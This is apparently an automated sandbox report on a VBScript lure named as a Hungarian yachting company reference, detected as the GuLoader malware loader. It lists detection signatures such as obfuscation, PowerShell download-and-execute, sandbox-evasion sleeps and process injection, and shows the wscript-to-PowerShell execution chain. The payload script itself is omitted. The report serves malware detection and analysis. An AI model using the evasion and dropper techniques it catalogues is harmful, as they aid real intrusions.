Windows Analysis Report
ADEX YACHTING Kft. REF HU03192025.vbs
Overview
General Information
Detection
GuLoader
Score: 100 (range 0 - 100)
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ADEX YACHTING Kft. REF HU03192025.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  powershell.exe (PID: 7524 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script omitted])